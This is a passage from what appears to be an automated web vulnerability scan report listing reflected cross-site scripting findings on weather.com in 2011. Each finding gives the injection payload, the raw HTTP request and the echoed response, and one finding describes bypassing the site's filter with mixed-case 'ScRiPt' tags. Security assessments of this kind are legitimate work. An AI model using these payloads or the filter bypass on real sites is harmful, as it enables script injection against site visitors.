SVRNAME: wxii2x06
X-Varnish: 2184767922
Date: Thu, 24 Mar 2011 17:43:16 GMT
Connection: keep-alive
Content-Length: 160046

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895a6"><script>alert(1)</script>4ee4cfc3b19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x02
X-Varnish: 2184766087
Date: Thu, 24 Mar 2011 17:43:11 GMT
Connection: keep-alive
Content-Length: 160121

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bc/favicon2.ico895a6"><script>alert(1)</script>4ee4cfc3b19" from="nav_secondary" >
...[SNIP]...
1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 26243><script>alert(1)</script>dc934610b23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:38 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156482513
Date: Thu, 24 Mar 2011 17:43:08 GMT
Connection: keep-alive
Content-Length: 160135

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico26243><script>alert(1)</script>dc934610b23" />
...[SNIP]...
1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload c1f25><script>alert(1)</script>4e7a608d98c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97c1f25><script>alert(1)</script>4e7a608d98c/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:29 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x03
X-Varnish: 1510934644
Date: Thu, 24 Mar 2011 17:40:59 GMT
Connection: keep-alive
Content-Length: 160054

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97c1f25><script>alert(1)</script>4e7a608d98c/bc/favicon2.ico" />
...[SNIP]...
1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c42e"-alert(1)-"d6b4ba102de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec977c42e"-alert(1)-"d6b4ba102de/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:34 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156439815
Date: Thu, 24 Mar 2011 17:41:04 GMT
Connection: keep-alive
Content-Length: 159973

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
= ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec977c42e"-alert(1)-"d6b4ba102de/bc/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/2
...[SNIP]...
1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd22c"><script>alert(1)</script>c14811a6efd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdd22c"><script>alert(1)</script>c14811a6efd/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:39 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1510938217
Date: Thu, 24 Mar 2011 17:41:09 GMT
Connection: keep-alive
Content-Length: 160104

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bcdd22c"><script>alert(1)</script>c14811a6efd/favicon2.ico" from="nav_secondary" >
...[SNIP]...
1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d86df"-alert(1)-"56616f0ff68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcd86df"-alert(1)-"56616f0ff68/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:44 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184727898
Date: Thu, 24 Mar 2011 17:41:14 GMT
Connection: keep-alive
Content-Length: 160030

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec97/bcd86df"-alert(1)-"56616f0ff68/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2
...[SNIP]...
1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload df27c><script>alert(1)</script>4d53e0d49b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(1)-%22370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_pers=%20s_nr%3D1300988433863%7C1303580433863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A6%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(1)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x00
X-Varnish: 1097013162
Date: Thu, 24 Mar 2011 17:41:06 GMT
Connection: keep-alive
Content-Length: 160099

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert(1)-"370523ec97/bcdf27c><script>alert(1)</script>4d53e0d49b1/favicon2.ico" />
...[SNIP]...
1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e879e"-alert(1)-"0b38706c039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather-appse879e"-alert(1)-"0b38706c039/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:55 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x07
X-Varnish: 2366509814
Date: Thu, 24 Mar 2011 17:37:25 GMT
Connection: keep-alive
Content-Length: 159833

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/weather-appse879e"-alert(1)-"0b38706c039/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987997794%7C1303579997794%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:49 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x05
X-Varnish: 1510862922
Date: Thu, 24 Mar 2011 17:37:19 GMT
Connection: keep-alive
Content-Length: 159916

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/weather-apps17d05"><ScRiPt>alert(1)</ScRiPt>e409bdb67f4/" />
...[SNIP]...
2. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

2.1. http://www.weather.com/activities/driving/rushhour/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
